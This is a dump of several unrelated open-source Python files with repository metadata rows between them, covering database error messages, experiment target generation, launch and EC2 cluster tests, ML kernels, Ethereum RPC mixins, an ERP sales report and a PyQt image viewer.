Enum,\
Float,\
Integer,\
String
from models.utils.api_errors import ApiErrors
from utils.logger import logger
DUPLICATE_KEY_ERROR_CODE = '23505'
NOT_FOUND_KEY_ERROR_CODE = '23503'
OBLIGATORY_FIELD_ERROR_CODE = '23502'
class Errors():
@staticmethod
def restize_global_error(e):
logger.error("UNHANDLED ERROR : ")
traceback.print_exc()
return ["global", "Une erreur technique s'est produite. Elle a été notée, et nous allons investiguer au plus vite."]
@staticmethod
def restize_data_error(e):
if e.args and len(e.args) > 0 and e.args[0].startswith('(psycopg2.DataError) value too long for type'):
max_length = re.search('\(psycopg2.DataError\) value too long for type (.*?) varying\((.*?)\)', e.args[0], re.IGNORECASE).group(2)
return ['global', "La valeur d'une entrée est trop longue (max " + max_length + ")"]
else:
return Errors.restize_global_error(e)
@staticmethod
def restize_integrity_error(e):
if hasattr(e, 'orig') and hasattr(e.orig, 'pgcode') and e.orig.pgcode == DUPLICATE_KEY_ERROR_CODE:
field = re.search('Key \((.*?)\)=', str(e._message), re.IGNORECASE).group(1)
return [field, 'Une entrée avec cet identifiant existe déjà dans notre base de données']
elif hasattr(e, 'orig') and hasattr(e.orig, 'pgcode') and e.orig.pgcode == NOT_FOUND_KEY_ERROR_CODE:
field = re.search('Key \((.*?)\)=', str(e._message), re.IGNORECASE).group(1)
return [field, 'Aucun objet ne correspond à cet identifiant dans notre base de données']
elif hasattr(e, 'orig') and hasattr(e.orig, 'pgcode') and e.orig.pgcode == OBLIGATORY_FIELD_ERROR_CODE:
field = re.search('column "(.*?)"', e.orig.pgerror, re.IGNORECASE).group(1)
return [field, 'Ce champ est obligatoire']
else:
return Errors.restize_global_error(e)
@staticmethod
def restize_type_error(e):
if e.args and len(e.args)>1 and e.args[1] == 'geography':
return [e.args[2], 'doit etre une liste de nombre décimaux comme par exemple : [2.22, 3.22]']
elif e.args and len(e.args)>1 and e.args[1] and e.args[1]=='decimal':
return [e.args[2], 'doit être un nombre décimal']
elif e.args and len(e.args)>1 and e.args[1] and e.args[1]=='integer':
return [e.args[2], 'doit être un entier']
else:
return Errors.restize_global_error(e)
@staticmethod
def restize_value_error(e):
if len(e.args)>1 and e.args[1] == 'enum':
return [e.args[2], ' doit etre dans cette liste : '+",".join(map(lambda x : '"'+x+'"', e.args[3]))]
else:
return Errors.restize_global_error(e)
def errors(self):
api_errors = ApiErrors()
data = self.__class__.__table__.columns._data
for key in data.keys():
col = data[key]
val = getattr(self, key)
if not isinstance(col, Column):
continue
if not col.nullable\
and not col.foreign_keys\
and not col.primary_key\
and col.default is None\
and val is None:
api_errors.addError(key, 'Cette information est obligatoire')
if val is None:
continue
if isinstance(col.type, (CHAR, String))\
and not isinstance(col.type, Enum)\
and not isinstance(val, str):
api_errors.addError(key, 'doit être une chaîne de caractères')
if isinstance(col.type, (CHAR, String))\
and isinstance(val, str)\
and col.type.length\
and len(val)>col.type.length:
api_errors.addError(key,
'Vous devez saisir moins de '
+ str(col.type.length)
+ ' caractères')
if isinstance(col.type, Integer)\
and not isinstance(val, int):
api_errors.addError(key, 'doit être un entier')
if isinstance(col.type, Float)\
and not isinstance(val, float):
api_errors.addError(key, 'doit être un nombre')
return api_errors
| 44.831683 | 142 | 0.57288 |
391dc3258ba2bacf56569912ebfdc8e3dc5d570b | 5,735 | py | Python | public/tgt_files/generate_test_rot.py | sheerkarny/OnPoint | 05f47ef7c9377a1a267ee3cdfa8947a074beb648 | [
"MIT"
] | 19 | 2020-07-03T18:25:48.000Z | 2021-12-10T05:16:06.000Z | public/tgt_files/generate_test_rot.py | sheerkarny/OnPoint | 05f47ef7c9377a1a267ee3cdfa8947a074beb648 | [
"MIT"
] | 1 | 2021-08-03T13:15:46.000Z | 2021-08-24T10:04:47.000Z | public/tgt_files/generate_test_rot.py | sheerkarny/OnPoint | 05f47ef7c9377a1a267ee3cdfa8947a074beb648 | [
"MIT"
] | 4 | 2020-08-25T13:16:41.000Z | 2021-08-18T08:06:45.000Z | """
This script is for generating JSON target files directly, which is the form used in the experiment.
To implement target jump, clamp, or online feedback make appropriate changes in the area flagged by the **TODO** comment.
"""
import json
import random
def generateTargetAngles(numTargets):
"""
temporary usage of this function for non-evenly spaced targets
"""
angleList = [45, 135]
if (len(angleList) != numTargets):
raise Exception('Target file does not have the right amount of targets. Should have ' + str(numTargets) + ' targets, but only has ' + str(len(angleList)))
return angleList
def generateJSON(numTargets, movementCycle, cycleDistribution, rotationAngle, targetDistance, numDemoCycles, demoTargetAngle):
# Ensure non demo cycles add up
if (movementCycle != sum(cycleDistribution)):
raise Exception('Number of non demo cycles do not add up. Should have ' + str(movementCycle) + ' cycles, but has ' + str(sum(cycleDistribution)) + '.')
if (len(cycleDistribution) != 4):
raise Exception('Incorrect amount of entries in cycle distribution, should have 4 but has ' + str(len(cycleDistribution)) + '.')
jsonData = {}
targetAngles = generateTargetAngles(numTargets)
numTrials = numTargets * movementCycle # block size
numDemoTrials = numDemoCycles * numTargets
totalNumTrials = numTrials + numDemoTrials
jsonData["numtrials"] = totalNumTrials
trialNums = {}
aimingLandmarks = {}
onlineFB = {}
endpointFB = {}
rotation = {}
clampedFB = {}
tgtDistance = {}
angles = []
anglesDict = {}
betweenBlocks = {}
targetJump = {}
# Breakpoints between phases
base_no_fb = cycleDistribution[0] * numTargets
base_fb = base_no_fb + (cycleDistribution[1] * numTargets)
demo = base_fb + numDemoTrials
rotate = demo + (cycleDistribution[2] * numTargets)
aftereffect_no_fb = rotate + (cycleDistribution[3] * numTargets)
if (totalNumTrials != aftereffect_no_fb):
raise Exception('Number of reaches do not add up. Should have ' + str(totalNumTrials) + ' targets, but only has ' + str(aftereffect_no_fb) + '.')
# Update the blocks whenever numTrials is changed.
# **TODO** Update values from 0 --> 1 to toggle effects
# For target jump, 1 ==> jump to target, any other integer != 0 or 1 ==> jump away from target to that degree
for i in range(totalNumTrials):
trialNums[i] = i + 1
aimingLandmarks[i] = 0
tgtDistance[i] = targetDistance
if i < base_no_fb :
onlineFB[i] = 0
endpointFB[i] = 0
rotation[i] = float(0)
clampedFB[i] = float(0)
targetJump[i] = float(0)
elif i < base_fb :
onlineFB[i] = 1
endpointFB[i] = 1
rotation[i] = float(0)
clampedFB[i] = float(0)
targetJump[i] = float(0)
elif i < demo:
onlineFB[i] = 1
endpointFB[i] = 1
rotation[i] = float(rotationAngle)
clampedFB[i] = float(1)
targetJump[i] = float(0)
elif i < rotate :
onlineFB[i] = 1
endpointFB[i] = 1
rotation[i] = float(rotationAngle)
clampedFB[i] = float(1)
targetJump[i] = float(0)
else:
onlineFB[i] = 0
endpointFB[i] = 0
rotation[i] = float(0)
clampedFB[i] = float(0)
targetJump[i] = float(0)
# Shuffle the targets
for i in range(totalNumTrials):
if i % numTargets == 0:
angles = targetAngles
random.shuffle(angles)
anglesDict[i] = float(angles[i % len(angles)])
betweenBlocks[str(i)] = 0.0
# Set up all demo targets
for i in range(base_fb, demo):
anglesDict[i] = float(demoTargetAngle)
for i in range(base_fb - 1, demo - 1):
betweenBlocks[str(i)] = 6
# Should automatically be updated by now
# 1 = baseline feedback instructions
# 2 = experiment paradigm understanding instructions
# 3 = after effect no feedback instructions
# 4 = attention check press 'a'
# 5 = attention check press 'e'
# 6 = demo instructions
betweenBlocks[str(base_no_fb - 1)] = 1
betweenBlocks[str(demo - 1)] = 2
betweenBlocks[str(rotate - 1)] = 3
# Attention check blocks // 5 = press 'a', 4 == press 'e', randomly pick spots before 50 trials, double check with index.js for consistency.
if (totalNumTrials > 39):
betweenBlocks[str(6)] = 4
betweenBlocks[str(14)] = 5
betweenBlocks[str(24)] = 4
betweenBlocks[str(39)] = 5
jsonData["trialnum"] = trialNums
jsonData["aiming_landmarks"] = aimingLandmarks
jsonData["online_fb"] = onlineFB
jsonData["endpoint_feedback"] = endpointFB
jsonData["rotation"] = rotation
jsonData["clamped_fb"] = clampedFB
jsonData["tgt_angle"] = anglesDict
jsonData["tgt_distance"] = tgtDistance
jsonData["between_blocks"] = betweenBlocks
jsonData["target_jump"] = targetJump
for key in jsonData.keys():
print ("key: ", key)
print ("value: ", jsonData[key])
print ("")
with open('testShort.json', 'w') as outfile:
json.dump(jsonData, outfile)
nonDemoCycles = [2, 2, 2, 2]
generateJSON(2, 8, nonDemoCycles, -10, 80, 2, 270)
"""
The above call 'generateJSON(2, 8, nonDemoCycles, -10, 80, 2, 270)' will generate a target file with:
- 2 targets
- 8 cycles (8 x 2 = 16 reaches) distributed into cycles of 2 (split by nonDemoCycles)
- -10 rotation angle (10 degrees clockwise)
- TargetDistance is not obsolete
- 2 demo trials at 270 degrees (straight down)
"""
| 37.730263 | 162 | 0.625283 |
9d39c1a59ac8fb7a5b633f9fc332e02a3fd1ec8b | 1,818 | py | Python | launch/test/launch/launch_description_source/test_python_launch_description_source.py | bedieber/launch | 4dfe69763379e405df7a21bde536aad7e39fdd93 | [
"Apache-2.0"
] | 67 | 2015-06-12T21:17:24.000Z | 2022-03-30T07:19:52.000Z | launch/test/launch/launch_description_source/test_python_launch_description_source.py | bedieber/launch | 4dfe69763379e405df7a21bde536aad7e39fdd93 | [
"Apache-2.0"
] | 516 | 2015-03-20T02:22:59.000Z | 2022-03-30T12:33:33.000Z | launch/test/launch/launch_description_source/test_python_launch_description_source.py | bedieber/launch | 4dfe69763379e405df7a21bde536aad7e39fdd93 | [
"Apache-2.0"
] | 101 | 2016-01-12T16:56:54.000Z | 2022-03-09T12:35:37.000Z | # Copyright 2018 Open Source Robotics Foundation, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for the PythonLaunchDescriptionSource class."""
import os
from launch import LaunchContext
from launch.launch_description_sources import InvalidPythonLaunchFileError
from launch.launch_description_sources import PythonLaunchDescriptionSource
import pytest
def test_python_launch_description_source():
"""Test the PythonLaunchDescriptionSource class."""
this_dir = os.path.dirname(os.path.abspath(__file__))
simple_launch_file_path = os.path.join(this_dir, 'simple.launch.py')
plds = PythonLaunchDescriptionSource(simple_launch_file_path)
assert 'python launch file' in plds.method
assert 'launch.substitutions.text_substitution.TextSubstitution' in plds.location
ld = plds.get_launch_description(LaunchContext())
assert plds.location == simple_launch_file_path
assert 0 == len(ld.entities)
with pytest.raises(InvalidPythonLaunchFileError):
plds = PythonLaunchDescriptionSource(os.path.join(this_dir, 'loadable_python_module.py'))
ld = plds.get_launch_description(LaunchContext())
with pytest.raises(FileNotFoundError):
plds = PythonLaunchDescriptionSource('does_not_exist')
ld = plds.get_launch_description(LaunchContext())
| 41.318182 | 97 | 0.779978 |
8d43cfae5bc4d8f65a0d7c4049c3873d08ddca11 | 2,008 | py | Python | Kernels.py | HamzaG737/Kmml-challenge-code | c7ae3e26a7e02e4951758c683f29c23c2ab9b3e4 | [
"MIT"
] | null | null | null | Kernels.py | HamzaG737/Kmml-challenge-code | c7ae3e26a7e02e4951758c683f29c23c2ab9b3e4 | [
"MIT"
] | null | null | null | Kernels.py | HamzaG737/Kmml-challenge-code | c7ae3e26a7e02e4951758c683f29c23c2ab9b3e4 | [
"MIT"
] | null | null | null | import numpy as np
from tqdm import tqdm
class Kernel:
"""
Class that defines different types of kernels
"""
def __init__(self, kernel="spectrum", gamma=0.1, deg=None, sigma=5.0, offset=0.0):
self.kernel = kernel
self.gamma = gamma
self.deg = deg
self.sigma = sigma
self.offset = offset
self.kfunction = self.kernel_function(kernel)
def kernel_function(self, kernel):
if kernel == "linear":
def f(x, y):
return np.inner(x, y)
return f
# Radial Basis Function
elif kernel == "rbf":
def f(x, y):
return np.exp(-self.gamma * (np.linalg.norm(x - y) ** 2))
return f
elif kernel == "polynomial":
def f(x, y):
return (self.gamma * (self.offset + np.dot(x, y))) ** self.deg
return f
elif kernel == "gaussian":
def f(x, y):
return np.exp(-linalg.norm(x - y) ** 2 / (2 * (self.sigma ** 2)))
return f
elif kernel == "spectrum":
def f(x, y):
inner = 0
for id_ in x:
if id_ in y:
inner += x[id_] * y[id_]
return inner
return f
def compute_gram_matrix(self, X):
n = len(X)
K = np.zeros((n, n))
for i in tqdm(range(n)):
for j in range(i + 1):
prod_scal = self.kfunction(X[i], X[j])
K[i, j] = prod_scal
K[j, i] = prod_scal
return K
def get_gram_cross(X_train, X_val, kernel="spectrum"):
"""
get pairwise kernel evaluations between train and val/test.
"""
ker = Kernel(kernel=kernel)
n, m = len(X_train), len(X_val)
gram_cross = np.zeros((n, m))
for i in tqdm(range(n)):
for j in range(m):
gram_cross[i, j] = ker.kfunction(X_train[i], X_val[j])
return gram_cross | 24.487805 | 86 | 0.487052 |
e15c3fe270796adbf0cf971573771fae821e3d07 | 5,600 | py | Python | dask_cloudprovider/aws/tests/test_ec2.py | heiqs/dask-cloudprovider | 093af2fe8156e3e6b51c68c108f35e1d7855977d | [
"BSD-3-Clause"
] | null | null | null | dask_cloudprovider/aws/tests/test_ec2.py | heiqs/dask-cloudprovider | 093af2fe8156e3e6b51c68c108f35e1d7855977d | [
"BSD-3-Clause"
] | null | null | null | dask_cloudprovider/aws/tests/test_ec2.py | heiqs/dask-cloudprovider | 093af2fe8156e3e6b51c68c108f35e1d7855977d | [
"BSD-3-Clause"
] | null | null | null | import pytest
aiobotocore = pytest.importorskip("aiobotocore")
from dask_cloudprovider.aws.ec2 import EC2Cluster
from dask_cloudprovider.aws.helper import get_latest_ami_id
from dask.distributed import Client
from distributed.core import Status
async def skip_without_credentials():
try:
async with aiobotocore.get_session().create_client("sts") as client:
await client.get_caller_identity()
except Exception:
pytest.skip(
"""
You must configure Your AWS credentials to run this test.
$ aws configure
"""
)
@pytest.fixture
async def cluster():
await skip_without_credentials()
async with EC2Cluster(asynchronous=True) as cluster:
yield cluster
@pytest.fixture
async def cluster_sync():
await skip_without_credentials()
cluster = EC2Cluster()
yield cluster
@pytest.fixture
async def cluster_rapids():
await skip_without_credentials()
async with EC2Cluster(
asynchronous=True,
# Deep Learning AMI (Ubuntu 18.04)
ami="ami-0c7c7d78f752f8f17",
# Python version must match local version and CUDA version must match AMI CUDA version
docker_image="rapidsai/rapidsai:cuda10.1-runtime-ubuntu18.04-py3.8",
instance_type="p3.2xlarge",
bootstrap=False,
filesystem_size=120,
) as cluster:
yield cluster
@pytest.fixture
async def cluster_rapids_packer():
await skip_without_credentials()
async with EC2Cluster(
asynchronous=True,
# Packer AMI
ami="ami-04e5539cb82859e69",
# Python version must match local version and CUDA version must match AMI CUDA version
docker_image="rapidsai/rapidsai:cuda10.1-runtime-ubuntu18.04-py3.8",
instance_type="p3.2xlarge",
bootstrap=False,
filesystem_size=120,
) as cluster:
yield cluster
@pytest.fixture
async def cluster_packer():
await skip_without_credentials()
async with EC2Cluster(
asynchronous=True, ami="ami-0e6187593ace05a0c", bootstrap=False
) as cluster:
yield cluster
@pytest.fixture
async def ec2_client():
await skip_without_credentials()
async with aiobotocore.get_session().create_client("ec2") as client:
yield client
@pytest.mark.asyncio
async def test_init():
cluster = EC2Cluster(asynchronous=True)
assert cluster.status == Status.created
@pytest.mark.asyncio
@pytest.mark.timeout(600)
async def test_create_cluster(cluster):
assert cluster.status == Status.running
cluster.scale(2)
await cluster
assert len(cluster.workers) == 2
async with Client(cluster, asynchronous=True) as client:
inc = lambda x: x + 1
assert await client.submit(inc, 10).result() == 11
@pytest.mark.asyncio
@pytest.mark.timeout(600)
async def test_create_cluster_sync(cluster_sync):
assert cluster_sync.status == Status.running
cluster_sync.scale(2)
with Client(cluster_sync) as client:
inc = lambda x: x + 1
assert client.submit(inc, 10).result() == 11
@pytest.mark.asyncio
@pytest.mark.timeout(600)
async def test_create_cluster_with_packer(cluster_packer):
assert cluster_packer.status == Status.running
cluster_packer.scale(2)
await cluster_packer
assert len(cluster_packer.workers) == 2
async with Client(cluster_packer, asynchronous=True) as client:
inc = lambda x: x + 1
assert await client.submit(inc, 10).result() == 11
@pytest.mark.asyncio
@pytest.mark.timeout(1200)
async def test_create_rapids_cluster(cluster_rapids):
assert cluster_rapids.status == Status.running
cluster_rapids.scale(1)
await cluster_rapids
assert len(cluster_rapids.workers) == 1
async with Client(cluster_rapids, asynchronous=True) as client:
def f():
import cupy
return float(cupy.random.random(100).mean())
assert await client.submit(f).result() < 1
@pytest.mark.asyncio
@pytest.mark.timeout(1200)
async def test_create_rapids_cluster_with_packer(cluster_rapids_packer):
assert cluster_rapids_packer.status == Status.running
cluster_rapids_packer.scale(1)
await cluster_rapids_packer
assert len(cluster_rapids_packer.workers) == 1
async with Client(cluster_rapids_packer, asynchronous=True) as client:
def f():
import cupy
return float(cupy.random.random(100).mean())
assert await client.submit(f).result() < 1
@pytest.mark.asyncio
async def test_get_ubuntu_image(ec2_client):
image = await get_latest_ami_id(
ec2_client,
"ubuntu/images/hvm-ssd/ubuntu-focal-20.04-amd64-server-*",
"099720109477", # Canonical
)
assert "ami-" in image
@pytest.mark.asyncio
async def test_get_cloud_init():
cloud_init = EC2Cluster.get_cloud_init(
env_vars={"EXTRA_PIP_PACKAGES": "s3fs"},
docker_args="--privileged",
)
assert "systemctl start docker" in cloud_init
assert " -e EXTRA_PIP_PACKAGES=s3fs " in cloud_init
assert " --privileged " in cloud_init
@pytest.mark.asyncio
async def test_get_cloud_init_rapids():
cloud_init = EC2Cluster.get_cloud_init(
# Deep Learning AMI (Ubuntu 18.04)
ami="ami-0c7c7d78f752f8f17",
# Python version must match local version and CUDA version must match AMI CUDA version
docker_image="rapidsai/rapidsai:cuda10.1-runtime-ubuntu18.04-py3.8",
instance_type="p3.2xlarge",
bootstrap=False,
filesystem_size=120,
)
assert "rapidsai" in cloud_init
| 27.317073 | 94 | 0.697143 |
4d2a70059a923a62f84cc544134dae80ddba9b24 | 650 | py | Python | aioethereum/management/__init__.py | h8is2w8/aioethereum | eb23e28068c34cda28bbef45c3f288d16936d88e | [
"MIT"
] | 16 | 2017-10-04T17:44:51.000Z | 2021-03-07T12:55:04.000Z | aioethereum/management/__init__.py | h8is2w8/aioethereum | eb23e28068c34cda28bbef45c3f288d16936d88e | [
"MIT"
] | 8 | 2017-10-04T22:53:08.000Z | 2021-01-15T18:04:41.000Z | aioethereum/management/__init__.py | h8is2w8/aioethereum | eb23e28068c34cda28bbef45c3f288d16936d88e | [
"MIT"
] | 5 | 2018-02-22T15:56:34.000Z | 2021-01-03T21:25:22.000Z | from .admin import AdminMixin
from .db import DbMixin
from .debug import DebugMixin
from .eth import EthMixin
from .miner import MinerMixin
from .net import NetMixin
from .personal import PersonalMixin
from .shh import ShhMixin
from .txpool import TxpoolMixin
from .web3 import Web3Mixin
__all__ = [
'AdminMixin',
'DbMixin',
'DebugMixin',
'EthMixin',
'MinerMixin',
'NetMixin',
'PersonalMixin',
'ShhMixin',
'TxpoolMixin',
'Web3Mixin',
'RpcMixin',
]
class RpcMixin(AdminMixin, DbMixin, DebugMixin, EthMixin, MinerMixin,
NetMixin, PersonalMixin, ShhMixin, TxpoolMixin, Web3Mixin):
pass
| 20.967742 | 74 | 0.704615 |
05f6887dfe6aab30c2a085e775c15cb296d95efa | 3,644 | py | Python | siqbal/siqbal/report/delivery_status_salesman/delivery_status_salesman.py | smehata/siqbal | 8b6a21fb63c050237593c49757065198c0e2c54a | [
"MIT"
] | 1 | 2021-08-07T12:48:02.000Z | 2021-08-07T12:48:02.000Z | siqbal/siqbal/report/delivery_status_salesman/delivery_status_salesman.py | smehata/siqbal | 8b6a21fb63c050237593c49757065198c0e2c54a | [
"MIT"
] | null | null | null | siqbal/siqbal/report/delivery_status_salesman/delivery_status_salesman.py | smehata/siqbal | 8b6a21fb63c050237593c49757065198c0e2c54a | [
"MIT"
] | 4 | 2021-01-16T06:14:58.000Z | 2022-02-07T06:36:41.000Z | # Copyright (c) 2013, RC and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
def execute(filters=None):
if not filters: filters = {}
columns = get_columns()
data = get_data(filters)
return columns, data
def get_data(filters):
user = frappe.session.user
filters["user"] = user
conditions = ""
roles = frappe.get_roles(user)
if filters.company:
conditions += "and so.company = %(company)s"
if "Salesman TC" in roles:
conditions += " and so.owner = %(user)s"
sos = frappe.db.sql("""
select so.name, so.owner, so.customer_name, so.transaction_date, soi.item_code, soi.item_name, soi.qty, soi.boxes, soi.pieces,
mr.qty, mr.boxes, mr.pieces, if(sed.docstatus = 1, 'Submitted', 'Pending'), sed.qty, sed.boxes, sed.pieces, si.qty,
if(
soi.amount = soi.billed_amt,
0,
ifnull(soi.qty, 0) - ifnull(si.qty, 0)
)
from
`tabSales Order Item` soi
left join `tabSales Order` so on so.name = soi.parent
left join (
select
tmr.docstatus,
sum(if(tmr.docstatus = 1, tmri.qty, 0)) qty,
sum(if(tmr.docstatus = 1, tmri.boxes, 0)) boxes,
sum(if(tmr.docstatus = 1, tmri.pieces, 0)) pieces,
tmri.sales_order,
tmri.item_code,
tmri.custom_warehouse_name
from
`tabMaterial Request` tmr
inner join `tabMaterial Request Item` tmri on tmr.name = tmri.parent
where
tmri.sales_order is not null
group by
tmri.item_code,
tmri.sales_order
) mr on mr.sales_order = soi.parent
and mr.item_code = soi.item_code
left join (
select
se.docstatus,
sum(if(se.docstatus = 1, sed.qty, 0)) qty,
sum(if(se.docstatus = 1, sed.boxes, 0)) boxes,
sum(if(se.docstatus = 1, sed.pieces, 0)) pieces,
sed.sales_order,
sed.item_code,
sed.s_warehouse,
sed.t_warehouse
from
`tabStock Entry Detail` sed
inner join `tabStock Entry` se on sed.parent = se.name
where
sed.sales_order is not null
and se.posting_date >= %(from_date) s
and sed.t_warehouse like '%%Transit%%'
group by
sed.item_code,
sed.sales_order,
sed.s_warehouse
) as sed on sed.item_code = soi.item_code
and sed.sales_order = soi.parent
left join (
select
si.docstatus,
sum(if(si.docstatus = 1, sii.qty, 0)) qty,
sum(if(si.docstatus = 1, sii.boxes, 0)) boxes,
sum(if(si.docstatus = 1, sii.pieces, 0)) pieces,
sii.sales_order,
sii.item_code,
sii.warehouse
from
`tabSales Invoice Item` sii
inner join `tabSales Invoice` si on sii.parent = si.name
where
sii.sales_order is not null
and si.posting_date >= %(from_date) s
and si.is_return != 1
group by
sii.item_code,
sii.sales_order
) as si on si.item_code = soi.item_code
and si.sales_order = soi.parent
where
so.docstatus = 1
and so.status not in ('Closed')
and so.transaction_date >= %(from_date) s
and so.transaction_date <= %(to_date) s
{conditions}
order by
so.transaction_date desc
""".format(conditions=conditions), filters, as_dict=False)
return sos
def get_columns():
"""return columns"""
columns = [
_("Bill No")+":Link/Sales Order:100",
_("Created By")+":Link/User:100",
_("Customer")+":Data:110",
_("Date")+":Date:80",
_("Code")+":Link/Item:70",
_("Item Name")+":Data:200",
_("(SO)SQM")+":Float:70",
_("(SO)Boxes")+":Int:70",
_("(SO)Pieces")+":Int:70",
_("(RQ)SQM")+":Int:70",
_("(RQ)Boxes")+":Int:70",
_("(RQ)Pieces")+":Int:70",
_("(SE)Status")+":Data:100",
_("(SE)QM")+":Float:70",
_("(SE)Boxes")+":Int:70",
_("(SE)Pieces")+":Int:70",
_("Deliverd")+":Float:70",
_("Remaining")+":Float:70",
]
return columns
| 26.405797 | 128 | 0.657794 |
780e62907c55203979929948b774220550b2d613 | 11,289 | py | Python | trash/image_viewer_mod_aug29.py | Zedd1558/Image-Inpainter | c8a78443bbbc31dd790a691c58639de295575f78 | [
"MIT"
] | 6 | 2020-09-15T03:10:53.000Z | 2021-02-21T02:43:51.000Z | trash/image_viewer_mod_aug29.py | Zedd1558/Image-Inpainter | c8a78443bbbc31dd790a691c58639de295575f78 | [
"MIT"
] | 2 | 2020-09-15T13:35:24.000Z | 2020-10-20T15:22:28.000Z | trash/image_viewer_mod_aug29.py | Zedd1558/Inpainter | 6865a0396696f6307ec283ebde35d722091a5963 | [
"MIT"
] | null | null | null | """ QtImageViewer.py: PyQt image viewer widget for a QPixmap in a QGraphicsView scene with mouse zooming and panning.
"""
import os.path
try:
from PyQt5.QtCore import Qt, QRectF, pyqtSignal, QT_VERSION_STR, QPoint
from PyQt5.QtGui import QImage, QPixmap, QPainterPath, QPen, QPainter
from PyQt5.QtWidgets import QGraphicsView, QGraphicsScene, QFileDialog
except ImportError:
try:
from PyQt4.QtCore import Qt, QRectF, pyqtSignal, QT_VERSION_STR
from PyQt4.QtGui import QGraphicsView, QGraphicsScene, QImage, QPixmap, QPainterPath, QFileDialog
except ImportError:
raise ImportError("QtImageViewer: Requires PyQt5 or PyQt4.")
__author__ = "Marcel Goldschen-Ohm <marcel.goldschen@gmail.com>"
__version__ = '0.9.0'
class QtImageViewer(QGraphicsView):
""" PyQt image viewer widget for a QPixmap in a QGraphicsView scene with mouse zooming and panning.
Displays a QImage or QPixmap (QImage is internally converted to a QPixmap).
To display any other image format, you must first convert it to a QImage or QPixmap.
Some useful image format conversion utilities:
qimage2ndarray: NumPy ndarray <==> QImage (https://github.com/hmeine/qimage2ndarray)
ImageQt: PIL Image <==> QImage (https://github.com/python-pillow/Pillow/blob/master/PIL/ImageQt.py)
Mouse interaction:
Left mouse button drag: Pan image.
Right mouse button drag: Zoom box.
Right mouse button doubleclick: Zoom to show entire image.
"""
# Mouse button signals emit image scene (x, y) coordinates.
# !!! For image (row, column) matrix indexing, row = y and column = x.
# leftMouseButtonPressed = pyqtSignal(float, float)
# rightMouseButtonPressed = pyqtSignal(float, float)
# leftMouseButtonReleased = pyqtSignal(float, float)
# rightMouseButtonReleased = pyqtSignal(float, float)
# leftMouseButtonDoubleClicked = pyqtSignal(float, float)
# rightMouseButtonDoubleClicked = pyqtSignal(float, float)
def __init__(self,scene,parent=None):
super().__init__(parent)
self.setScene(scene)
self.scene = scene
# Store a local handle to the scene's current image pixmap.
self._pixmapHandle = None
# Image aspect ratio mode.
# !!! ONLY applies to full image. Aspect ratio is always ignored when zooming.
# Qt.IgnoreAspectRatio: Scale image to fit viewport.
# Qt.KeepAspectRatio: Scale image to fit inside viewport, preserving aspect ratio.
# Qt.KeepAspectRatioByExpanding: Scale image to fill the viewport, preserving aspect ratio.
self.aspectRatioMode = Qt.KeepAspectRatio
# Scroll bar behaviour.
# Qt.ScrollBarAlwaysOff: Never shows a scroll bar.
# Qt.ScrollBarAlwaysOn: Always shows a scroll bar.
# Qt.ScrollBarAsNeeded: Shows a scroll bar only when zoomed.
self.setHorizontalScrollBarPolicy(Qt.ScrollBarAsNeeded)
self.setVerticalScrollBarPolicy(Qt.ScrollBarAsNeeded)
# Stack of QRectF zoom boxes in scene coordinates.
self.zoomStack = []
# Flags for enabling/disabling mouse interaction.
self.zoomMode = False
self.drawMode = True
self.canZoom = True
self.canPan = True
self.drawing = False
self.brushSize = 2
self.brushColor = Qt.red
self.lastPoint = QPoint()
def hasImage(self):
""" Returns whether or not the scene contains an image pixmap.
"""
return self._pixmapHandle is not None
def clearImage(self):
""" Removes the current image pixmap from the scene if it exists.
"""
if self.hasImage():
self.scene.removeItem(self._pixmapHandle)
self._pixmapHandle = None
def pixmap(self):
""" Returns the scene's current image pixmap as a QPixmap, or else None if no image exists.
:rtype: QPixmap | None
"""
if self.hasImage():
return self._pixmapHandle.pixmap()
return None
def image(self):
""" Returns the scene's current image pixmap as a QImage, or else None if no image exists.
:rtype: QImage | None
"""
if self.hasImage():
return self._pixmapHandle.pixmap().toImage()
return None
def setImage(self, image):
""" Set the scene's current image pixmap to the input QImage or QPixmap.
Raises a RuntimeError if the input image has type other than QImage or QPixmap.
:type image: QImage | QPixmap
"""
if type(image) is QPixmap:
pixmap = image
elif type(image) is QImage:
pixmap = QPixmap.fromImage(image)
else:
raise RuntimeError("ImageViewer.setImage: Argument must be a QImage or QPixmap.")
if self.hasImage():
self._pixmapHandle.setPixmap(pixmap)
else:
self._pixmapHandle = self.scene.addPixmap(pixmap)
self.setSceneRect(QRectF(pixmap.rect())) # Set scene size to image size.
self.updateViewer()
def loadImageFromFile(self, fileName=""):
""" Load an image from file.
Without any arguments, loadImageFromFile() will popup a file dialog to choose the image file.
With a fileName argument, loadImageFromFile(fileName) will attempt to load the specified image file directly.
"""
if len(fileName) == 0:
if QT_VERSION_STR[0] == '4':
fileName = QFileDialog.getOpenFileName(self, "Open image file.")
elif QT_VERSION_STR[0] == '5':
fileName, dummy = QFileDialog.getOpenFileName(self, "Open image file.")
if len(fileName) and os.path.isfile(fileName):
image = QImage(fileName)
self.setImage(image)
def updateViewer(self):
""" Show current zoom (if showing entire image, apply current aspect ratio mode).
"""
if not self.hasImage():
return
if len(self.zoomStack) and self.sceneRect().contains(self.zoomStack[-1]):
self.fitInView(self.zoomStack[-1], Qt.IgnoreAspectRatio) # Show zoomed rect (ignore aspect ratio).
else:
self.zoomStack = [] # Clear the zoom stack (in case we got here because of an invalid zoom).
self.fitInView(self.sceneRect(), self.aspectRatioMode) # Show entire image (use current aspect ratio mode).
def resizeEvent(self, event):
""" Maintain current zoom on resize.
"""
self.updateViewer()
def mouseMoveEvent(self, event):
if self.drawMode:
print('mouse moving in drawMode')
if(event.buttons() and Qt.LeftButton) and self.drawing:
pixmap = self.pixmap()
painter = QPainter(pixmap)
painter.setRenderHint(QPainter.Antialiasing, True)
painter.setPen(QPen(self.brushColor, self.brushSize, Qt.SolidLine, Qt.RoundCap, Qt.RoundJoin))
painter.drawLine(self.lastPoint, self.mapToScene(event.pos()))
painter.end()
self.lastPoint = self.mapToScene(event.pos())
self._pixmapHandle.setPixmap(pixmap)
self.update()
if self.zoomMode:
pass
def mousePressEvent(self, event):
""" Start mouse pan or zoom mode.
"""
